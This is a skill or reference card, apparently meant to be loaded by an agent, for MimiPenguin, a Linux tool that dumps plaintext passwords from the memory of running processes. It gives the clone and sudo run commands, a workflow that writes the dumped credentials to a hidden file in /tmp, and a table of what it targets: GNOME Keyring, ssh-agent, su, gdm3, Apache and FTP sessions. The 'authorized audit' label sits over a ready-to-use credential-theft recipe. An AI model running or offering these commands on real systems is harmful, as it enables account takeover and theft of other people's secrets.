| name | mimipenguin |
| description | Auth/lab ref: Linux secret-exposure audit; process/memory artifact review for authorized recovery and defensive validation. |
| license | MIT |
| compatibility | Python 3 / Bash; Linux; requires root. |
| metadata | {"author":"AeonDave","version":"1.0"} |
MimiPenguin
Linux credential dumper — extract plaintext passwords from memory (Mimikatz-equivalent for Linux).
Quick Start
git clone https://github.com/huntergregal/mimipenguin
cd mimipenguin
sudo python3 mimipenguin.py
sudo bash mimipenguin.sh
Sources Dumped
| Source | Notes |
|---|
| GNOME Keyring | /proc/<PID>/mem of gnome-keyring-daemon |
| VSFTPd | Active FTP session credentials |
| Apache Basic Auth | HTTP Basic Auth from apache2 process |
| SSH | SSH passphrase from ssh-agent |
| gdm3 | GNOME Display Manager login |
| su | Credentials from su process |
Common Workflows
Quick dump all sources:
sudo python3 mimipenguin.py 2>/dev/null
Shell version (no python dependency):
sudo bash mimipenguin.sh
Redirect output:
sudo python3 mimipenguin.py | tee /tmp/.creds
Note: Effectiveness depends on what services are running and memory layout.
Resources
| File | When to load |
|---|
references/ | Process memory dump techniques on Linux |